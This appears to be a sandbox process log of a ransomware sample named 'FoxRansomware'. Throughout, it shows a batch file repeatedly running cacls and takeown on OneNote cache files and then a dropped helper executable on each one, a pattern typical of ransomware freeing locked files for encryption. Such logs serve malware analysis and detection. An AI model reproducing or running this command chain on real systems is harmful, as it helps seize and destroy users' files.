C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin" /E /G Admin:F /C3⤵PID:1936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin"3⤵PID:1416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000006J.bin" -nobanner3⤵PID:4804
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000006J.bin" -nobanner4⤵PID:5260
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5436
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin""2⤵PID:5628
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin" /E /G Admin:F /C3⤵PID:2372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin"3⤵
- Modifies file permissions
PID:5316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000007R.bin" -nobanner3⤵PID:2236
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000007R.bin" -nobanner4⤵PID:1340
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5152
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin""2⤵PID:6056
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin" /E /G Admin:F /C3⤵PID:5324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin"3⤵PID:5352
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000085.bin" -nobanner3⤵PID:5372
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000085.bin" -nobanner4⤵PID:3688
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin""2⤵PID:4488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin" /E /G Admin:F /C3⤵PID:2828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin"3⤵
- Modifies file permissions
PID:5196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000008R.bin" -nobanner3⤵PID:5208
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000008R.bin" -nobanner4⤵PID:5276
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin""2⤵PID:5416
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin" /E /G Admin:F /C3⤵PID:5684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin"3⤵PID:4892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000009H.bin" -nobanner3⤵PID:1544
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000009H.bin" -nobanner4⤵PID:5596
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin""2⤵PID:5364
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin" /E /G Admin:F /C3⤵PID:2896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin"3⤵PID:2104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "000000AD.bin" -nobanner3⤵PID:1304
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "000000AD.bin" -nobanner4⤵PID:5716
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin""2⤵PID:4832
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin" /E /G Admin:F /C3⤵PID:5236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin"3⤵PID:5788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "000000AN.bin" -nobanner3⤵PID:4404
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "000000AN.bin" -nobanner4⤵PID:3236
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4276
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin""2⤵PID:276
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin" /E /G Admin:F /C3⤵PID:5244
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin"3⤵
- Modifies file permissions
PID:5924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "000000B3.bin" -nobanner3⤵PID:2928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "000000B3.bin" -nobanner4⤵PID:4016
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin""2⤵PID:5492
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin" /E /G Admin:F /C3⤵PID:964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin"3⤵
- Modifies file permissions
PID:3724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000007.bin" -nobanner3⤵PID:6036
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000007.bin" -nobanner4⤵PID:5712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin""2⤵PID:4300
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin" /E /G Admin:F /C3⤵PID:4148
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin"3⤵PID:2960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000000L.bin" -nobanner3⤵PID:4920
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000000L.bin" -nobanner4⤵PID:5160
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1180
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin""2⤵PID:696
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin" /E /G Admin:F /C3⤵PID:376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin"3⤵PID:6108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000000V.bin" -nobanner3⤵PID:4804
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000000V.bin" -nobanner4⤵PID:2180
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin""2⤵PID:300
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin" /E /G Admin:F /C3⤵PID:4260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin"3⤵PID:5992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000009.bin" -nobanner3⤵PID:2236
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000009.bin" -nobanner4⤵PID:3676
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5780
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin""2⤵PID:3952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin" /E /G Admin:F /C3⤵PID:5748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin"3⤵
- Modifies file permissions
PID:2536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000000N.bin" -nobanner3⤵PID:4536
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000000N.bin" -nobanner4⤵PID:5372
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin""2⤵PID:6056
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin" /E /G Admin:F /C3⤵PID:4204
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin"3⤵PID:5812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000011.bin" -nobanner3⤵PID:5412
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000011.bin" -nobanner4⤵PID:5024
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2512
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin""2⤵PID:5076
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin" /E /G Admin:F /C3⤵PID:5672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin"3⤵
- Modifies file permissions
PID:2812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000006D.bin" -nobanner3⤵PID:4996
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000006D.bin" -nobanner4⤵PID:5596
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin""2⤵PID:5696
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin" /E /G Admin:F /C3⤵PID:2896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin"3⤵PID:4496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000006L.bin" -nobanner3⤵PID:5896
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000006L.bin" -nobanner4⤵PID:768
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin""2⤵PID:440
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin" /E /G Admin:F /C3⤵PID:6072
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin"3⤵PID:5872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000006N.bin" -nobanner3⤵PID:5236
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000006N.bin" -nobanner4⤵PID:5788
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin""2⤵PID:4776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin" /E /G Admin:F /C3⤵PID:2760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin"3⤵PID:1044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000007T.bin" -nobanner3⤵PID:5228
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000007T.bin" -nobanner4⤵PID:5340
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3324
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin""2⤵PID:3908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin" /E /G Admin:F /C3⤵PID:3260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin"3⤵PID:964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000087.bin" -nobanner3⤵PID:3724
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000087.bin" -nobanner4⤵PID:3556
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin""2⤵PID:5888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin" /E /G Admin:F /C3⤵PID:1532
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin"3⤵PID:4148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000099.bin" -nobanner3⤵PID:2960
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000099.bin" -nobanner4⤵PID:4560
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin""2⤵PID:1940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin" /E /G Admin:F /C3⤵PID:5240
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin"3⤵PID:3792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000009J.bin" -nobanner3⤵PID:5360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000009J.bin" -nobanner4⤵PID:5164
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:180
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin""2⤵PID:6100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin" /E /G Admin:F /C3⤵PID:5616
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin"3⤵PID:1048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "000000A4.bin" -nobanner3⤵PID:5272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "000000A4.bin" -nobanner4⤵PID:5628
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin""2⤵PID:3528
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin" /E /G Admin:F /C3⤵PID:4612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin"3⤵PID:5732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "000000AF.bin" -nobanner3⤵PID:5324
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "000000AF.bin" -nobanner4⤵PID:5976
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin""2⤵PID:4204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin" /E /G Admin:F /C3⤵PID:2684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin"3⤵PID:1992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "000000AP.bin" -nobanner3⤵PID:4808
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "000000AP.bin" -nobanner4⤵PID:5832
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin""2⤵PID:4164
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin" /E /G Admin:F /C3⤵PID:2808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin"3⤵PID:3024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "000000B5.bin" -nobanner3⤵PID:6000
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "000000B5.bin" -nobanner4⤵PID:5716
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin""2⤵PID:4584
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin" /E /G Admin:F /C3⤵PID:2956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin"3⤵PID:6120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000007V.bin" -nobanner3⤵PID:5940
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000007V.bin" -nobanner4⤵PID:2176
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin""2⤵PID:5688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin" /E /G Admin:F /C3⤵PID:5364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin"3⤵PID:5128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000089.bin" -nobanner3⤵PID:1044
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000089.bin" -nobanner4⤵PID:4416
-
-
-
